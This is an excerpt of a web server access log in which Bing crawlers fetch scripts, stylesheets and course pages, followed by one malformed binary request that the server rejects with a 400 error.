40.77.188.224 - - [30/Apr/2021:08:31:49 -0500] "GET /js/CST.js?S&datetime=20210430083146 HTTP/1.1" 200 12049 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.188.194 - - [30/Apr/2021:08:31:49 -0500] "GET /css/CST.css?datetime=20210430083146 HTTP/1.1" 200 24467 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.190.60 - - [30/Apr/2021:08:31:49 -0500] "GET /js/div.js?i&datetime=20210430083146 HTTP/1.1" 200 7433 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.188.64 - - [30/Apr/2021:08:31:49 -0500] "GET /css/printing.css?datetime=20210430083146 HTTP/1.1" 200 5910 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.188.131 - - [30/Apr/2021:08:31:49 -0500] "GET /js/CollapsibleLists.js?o&datetime=20210430083146 HTTP/1.1" 200 1018 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.188.234 - - [30/Apr/2021:08:31:49 -0500] "GET /js/openCenteredWindow.js?p&datetime=20210430083146 HTTP/1.1" 200 3771 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b"
40.77.167.70 - - [30/Apr/2021:08:39:38 -0500] "GET /JimMartinson/CST1611/ HTTP/1.1" 200 10241 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.70 - - [30/Apr/2021:08:39:39 -0500] "GET /JimMartinson/MMDT1021/Resources/Brackets/Linux/ HTTP/1.1" 200 506 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
183.220.6.14 - - [30/Apr/2021:08:41:41 -0500] "\x03\x00\x00\x13\x0E\xE0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x03\x00\x00\x00" 400 173 "-" "-"
